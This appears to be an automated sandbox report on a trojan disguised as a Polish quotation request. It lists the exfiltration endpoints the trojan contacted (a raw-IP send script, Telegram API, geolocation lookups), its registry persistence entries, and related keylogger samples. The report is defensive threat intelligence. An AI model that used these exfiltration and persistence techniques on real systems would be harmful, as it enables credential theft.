                                                                                                                                                                                                https://zxq.net/what-happened-to-the-old-zxq-website/LMEMpbrexplorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedzapytanie ofertowe st-2024-s315 cpa9170385.exe , 00000001.00000002.2058258965.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4483583747.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://zxq.net/#organizationcmsys.cmn.4.drfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://zxq.net/wp-content/themes/smart-mag/css/icons/fonts/ts-icons.woff2?v2.2explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325346008.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://zxq.net/wp-content/uploads/2022/03/follow-us-on-google-news-banner-black.pngexplorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://zxq.net/news/business/cmsys.cmn.4.drfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            https://api.telegram.orgRegSvcs.exe, 0000000A.00000002.4486046867.0000000002E35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://zxq.net/cmsys.gife0explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://yoast.com/wordpress/plugins/seo/explorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325346008.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://zxq.net/what-happened-to-the-old-zxq-website/Zexplorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://vccmd02.googlecode.com/files/cmsys.gifpexplorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://reallyfreegeoip.org/xml/173.254.250.72$RegSvcs.exe, 0000000A.00000002.4486046867.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.4486046867.0000000002E35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://zxq.net/wp-content/uploads/2024/10/DIY-Home-Repair-Projects-for-Busy-Singaporeans-450x253.pnexplorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://zxq.net/what-happened-to-the-old-zxq-website/Uexplorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448601457.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325265874.000000000072A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2448550627.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555885761.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2555958854.0000000000729000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.0000000000725000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192186591.0000000000729000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          https://zxq.net/wp-content/uploads/2024/10/Snoring-and-Sleep-Apnea-450x253.pngexplorer.exe, 00000004.00000003.2325437743.0000000003BA4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325504423.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192097102.000000000071E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2658846234.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325214501.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2192222397.0000000003B85000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2325465264.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, what-happened-to-the-old-zxq-website[1].htm.4.dr, cmsys.cmn.4.drfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://zxq.net/diy-home-repair-projects-for-busy-singaporeans/cmsys.cmn.4.drfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://vccmd02.googlecode.com/files/cmsys.gifgexplorer.exe, 00000004.00000003.2658511629.000000000072A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                149.154.167.220
                                                                                                                                                                                                                                api.telegram.orgUnited Kingdom
                                                                                                                                                                                                                                62041TELEGRAMRUtrue
                                                                                                                                                                                                                                142.251.168.82
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                188.114.97.3
                                                                                                                                                                                                                                unknownEuropean Union
                                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                108.177.15.82
                                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                64.233.166.82
                                                                                                                                                                                                                                googlecode.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                                188.114.96.3
                                                                                                                                                                                                                                reallyfreegeoip.orgEuropean Union
                                                                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                212.44.112.138
                                                                                                                                                                                                                                mail.tlakovec.siSlovenia
                                                                                                                                                                                                                                43128DHH-ASSItrue
                                                                                                                                                                                                                                51.81.194.202
                                                                                                                                                                                                                                zxq.netUnited States
                                                                                                                                                                                                                                16276OVHFRtrue
                                                                                                                                                                                                                                132.226.247.73
                                                                                                                                                                                                                                checkip.dyndns.comUnited States
                                                                                                                                                                                                                                16989UTMEMUSfalse
                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                192.168.2.5
                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1544451
                                                                                                                                                                                                                                Start date and time:2024-10-29 13:07:06 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 11m 50s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:69
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@398/19@47/10
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                • Number of executed functions: 52
                                                                                                                                                                                                                                • Number of non-executed functions: 239
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 88.221.110.91, 192.229.221.95
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • VT rate limit hit for: ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe
                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                08:07:56API Interceptor372x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                                                08:07:56API Interceptor3977x Sleep call for process: explorer.exe modified
                                                                                                                                                                                                                                08:08:02API Interceptor8473608x Sleep call for process: RegSvcs.exe modified
                                                                                                                                                                                                                                13:08:00AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Explorer c:\windows\system\explorer.exe RO
                                                                                                                                                                                                                                13:08:08AutostartRun: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Svchost c:\windows\system\svchost.exe RO
                                                                                                                                                                                                                                13:08:26AutostartRun: WinLogon Shell C:\Windows\explorer.exe
                                                                                                                                                                                                                                13:08:34AutostartRun: WinLogon Shell c:\windows\system\explorer.exe
                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                149.154.167.220rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                  M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                    Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                      swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        Fedex.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                          come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                            Fa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                              AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                z45paymentadvice.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                  rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                    188.114.97.3rPO_28102400.exeGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                                                                    • ghcopz.shop/ClarkB/PWS/fre.php
                                                                                                                                                                                                                                                    PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                    • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                                                                                                                                                                                                                    SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                                                                                                                                                                                                    • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                                                                                                                                                                                                    5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                                                                                                                                                                                                                                                    PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                    • www.cc101.pro/4hfb/
                                                                                                                                                                                                                                                    QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                    • filetransfer.io/data-package/cDXpxO66/download
                                                                                                                                                                                                                                                    Instruction_1928.pdf.lnk.download.lnkGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • tech-tribune.shop/pLQvfD4d5/index.php
                                                                                                                                                                                                                                                    WBCDZ4Z3M2667YBDZ5K4.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • tech-tribune.shop/pLQvfD4d5/index.php
                                                                                                                                                                                                                                                    yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                                                                                                                                                                    • www.rs-ag.com/
                                                                                                                                                                                                                                                    https://is.gd/6NgVrQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    • aa.opencompanies.co.uk/vEXJm/
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    reallyfreegeoip.orgrShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                    M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                    Bill Of Lading.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                    Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    dekont_001.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                    z74fBF2ObiS1g87mbS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                    INVOICE.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                    QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    z19UrgentOrder.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                    zxq.netADSP-21593BBPZ10 Analog Devices, Inc. 5000.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    1727684587d91a3fc4a77823bfb5c4c41b9d6c0bff84ae126bd19290c7e03bed994fdb4477364.dat-decoded.exeGet hashmaliciousCryptOne, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    7Y18r(169).exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    LisectAVT_2403002B_401.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    LisectAVT_2403002B_437.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    E6BA0CFA-EE50-4631-8FEC-4CD80E9E2189_06142024215103589.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    1ptg18pvgv.exeGet hashmaliciousCryptOne, NeshtaBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    2LfSD1iMxK.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    EOCFTL.exeGet hashmaliciousCryptOneBrowse
                                                                                                                                                                                                                                                    • 51.81.194.202
                                                                                                                                                                                                                                                    wJ5fr6j24t.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                                                                                                                                                                                                    • 185.196.8.22
                                                                                                                                                                                                                                                    api.telegram.orgrShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    Fedex.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    Fa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    z45paymentadvice.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    TELEGRAMRUrShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    M2AB8BeHc4.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    swift-copy31072024PDF.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    Fedex.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    Fa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    z45paymentadvice.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                                                                    CLOUDFLARENETUSAvis de virement.10.28.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.66.0.235
                                                                                                                                                                                                                                                    https://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para);Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                                    Jonathangodber October 2024.pdfGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                                    https://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para)Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    #U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.155.19
                                                                                                                                                                                                                                                    #U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.195.227
                                                                                                                                                                                                                                                    http://dcrealestateclasses.com/sirmy359ka/logfds65475mnvn/0Px7KgmP2ER6zsKKoRahD/ZGFuaWVscGxvdHRlbEBxdWFudGV4YS5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                                    la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.16.55.19
                                                                                                                                                                                                                                                    https://docs.google.com/drawings/d/1OzqwiA1nI8GUoiKob_qJY5xL1HmGK6VrRXlYUDuD68w/preview?pli=1JXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlGet hashmaliciousMamba2FABrowse
                                                                                                                                                                                                                                                    • 104.17.24.14
                                                                                                                                                                                                                                                    CLOUDFLARENETUSAvis de virement.10.28.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.66.0.235
                                                                                                                                                                                                                                                    https://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para);Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                                    Jonathangodber October 2024.pdfGet hashmaliciousTycoon2FABrowse
                                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                                    https://pub-75eadb7757ac4bf2ab3de7c52d2a4895.r2.dev/index.html#'+tFjvjBPh,document%5B'body'%5D%5B'appendChild'%5D(para)Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                    #U2749VER_COMPROVATIVO#U2749_#U2467#U2467#U2462#U2462#U2467#U2461#U2464#U2463.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.155.19
                                                                                                                                                                                                                                                    #U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 172.67.195.227
                                                                                                                                                                                                                                                    http://dcrealestateclasses.com/sirmy359ka/logfds65475mnvn/0Px7KgmP2ER6zsKKoRahD/ZGFuaWVscGxvdHRlbEBxdWFudGV4YS5jb20=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.17.25.14
                                                                                                                                                                                                                                                    la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 104.16.55.19
